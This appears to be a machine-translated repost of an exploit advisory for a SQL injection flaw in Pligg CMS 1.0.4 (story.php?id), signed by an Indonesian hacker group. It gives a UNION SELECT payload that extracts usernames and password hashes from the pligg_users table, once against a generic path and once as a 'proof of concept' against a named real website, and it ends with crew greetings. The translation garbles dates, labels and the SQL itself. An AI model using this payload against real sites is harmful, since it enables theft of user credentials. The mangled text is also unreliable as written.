Test method:
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! /*************************************** ***********************************
[!] Pligg CMS (story. php? Id) SQL Injection Vulnerability
[!] Author: Don Tukulesto (root@indonesiancoder.com)
[!] Homepage: http://indonesiancoder.com
[!] Date: Tue, limit l 27,201 0
[!] Tune in: The http://antisecradio.fm (choose your weapon)
**************************************** **********************************/
[Software Information]
[>] Vendor: A http://www.pligg.com/
[>] Download: http://www.pligg.com/download/
[>] Name: Social Networking Software
[>] Version: 1.0.4 and previous
[>] License: GPL
[>] Type: Non-marshcial (open source CMS)
[>] Method: SQL Injection
========================================================== ======================
[Explain 0! T]
Http: // server/path/story. php? Id = 2 + AND + 1 = 2 + UNION + SELECT +, concat (user_login, 0x3a, user_pass ), 17,18, 19,20, 22, from + pligg_users --
[Proof of Concept]
Http://www.postanotizie.it/story.php? Id = 2 + AND + 1 = 2 + UNION + SELECT +, concat (user_login, 0x3a, user_pass ), 17,18, 19,20, 22, from + pligg_users --
========================================================== ======================
[Cheers]
[>] Hussin X found bugs at Plig CMS Version 9.9.0
[>] Indonesian Coder Team-AntiSecurity-ServerIsDown-SurabayaHackerLink
[>] My brother M364TR0N-kaMtiEz-Gonzhack-El N4ck0-ibl13Z-arianom-YaDoY666-./Jack-
[>] Neng elv1n4-xshadow-SAINT-Cyb3r_tr0n-M3NW5-Pathloader-Mboys-Contrex-amxku-inj3ct0r
[>] Xnitro @ xtremenitro.org-DraCoola-r3m1ck-Senot-ran-CherCut-Ghambass-CyberSector 31
[>] James Brown & Todd @ packetstormsecurity.org-Maksymilian & sp3x @ securityreason.com
[Notes]
[>] We are one unity, we are a coder family, AND WE ARE INDONESIAN CODER TEAM